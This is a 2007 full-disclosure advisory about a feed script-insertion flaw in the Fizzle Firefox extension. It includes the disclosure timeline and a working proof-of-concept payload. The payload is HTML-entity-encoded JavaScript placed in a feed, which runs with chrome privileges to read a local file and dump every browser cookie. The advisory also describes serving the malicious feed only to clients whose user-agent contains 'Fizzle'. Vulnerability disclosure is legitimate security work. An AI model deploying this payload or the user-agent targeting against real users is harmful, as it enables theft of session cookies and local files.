Advertisements

 Fizzle Extension for Firefox Feed Script Insertion Vulnerability

Monday, 26 March 2007

Fizzle allows feeds to use HTML in feed data resulting in JavaScript being run in the chrome: window with chrome permissions. The extension will  convert HTML entities back to their ASCII equivalents thus &lt; becomes < and so forth. Various feeds fields are vulnerable including the title which allows the code to execute when Fizzle is opened and no need for the feed to be viewed.

The author Andy Frank was notified about the issue on 01/29/2007 we corresponded on the issue and I even offered to create a patch which I did. The patch did not meet his liking since the sanitation was too strict and made some feeds who use certain tags like <p> for formatting to lose their layout I told him it would be too difficult to sanitize the data unless its strict because so many attack variations could be used, and best thing to do is not allow HTML at all in the feed. On 02/20/2007 we ended discussions on this and I notified addons.mozilla.org about the problem and the developers lack of concern in fixing the extension or at least disabling its download so people would not download the extension. Well Mozilla didn't bother to remove it and have chosen to remove the extension in a future date when addons.mozilla.org is updated. Since then over 2,000+ users have additionally downloaded the extension, invoking me to go full-disclosure about it.

Fizzle 0.5 (previous versions likely vulnerable as well)
https://addons.mozilla.org/firefox/1307/

Below is the example I have tested out using version 0.5 and under nightly Firefox. Please note that the HTML entities must be present for the exploit to work. Place the below in your feed body and subscribe to the feed. View the feed in Fizzle. When testing make sure you clear the Fizzle cache in the fizzle folder under the Firefox profile.

An attacker can check if a feed subscriber has Fizzle because Fizzle's HTTP request sends a custom user-agent which has the word 'Fizzle' in it. Detecting that keyword an attacker can serve a malicious copy of the feed instead.

--------------------------------------------------------------------------
POC: Local File Reading and Cookie Reading (The HTML entities MUST be used)
--------------------------------------------------------------------------
&lt;script&gt;

function read(readfile)
{
    var file = Components.classes[&quot;@mozilla.org/file/local;1&quot;]
             .createInstance(Components.interfaces.nsILocalFile);
    file.initWithPath(readfile);
    var is =
Components.classes[&quot;@mozilla.org/network/file-input-stream;1&quot;]
           .createInstance(Components.interfaces.nsIFileInputStream);
    is.init(file, 0x01, 00004, null);
    var sis =
Components.classes[&quot;@mozilla.org/scriptableinputstream;1&quot;]
            .createInstance(Components.interfaces.nsIScriptableInputStream);
    sis.init(is);
    var output = sis.read(sis.available());
    alert(output);
}
read(&quot;C:\test.txt&quot;);

function getCookies()
{
    var cookieManager =
Components.classes[&quot;@mozilla.org/cookiemanager;1&quot;]
                      .getService(Components.interfaces.nsICookieManager);
    var str = '';
    var iter = cookieManager.enumerator;
    while (iter.hasMoreElements())
    {
        var cookie = iter.getNext();
        if (cookie instanceof Components.interfaces.nsICookie)
        {
            str += &quot;Host: &quot; + cookie.host
                 + &quot;\nName: &quot; + cookie.name
                 + &quot;\nValue: &quot; + cookie.value
                 + &quot;\n\n&quot;;
        }
    }
    alert(str);
}
getCookies()

&lt;/script&gt;
- -------------------------------------------------------------------------

I apologize for the blank emails before. Outblaze the provider for my other email was for some reason sending the email as blank. So using this account instead.

Regards,
CM.

Original advisories
:
http://seclists.org/bugtraq/2007/Mar/0393.html
http://secunia.com/advisories/24654/



Share this content:
        
Advertisements
Home | News | Articles | Advisories | Submit | Alerts | Links | What is XSS | About | Contact | Some Rights Reserved.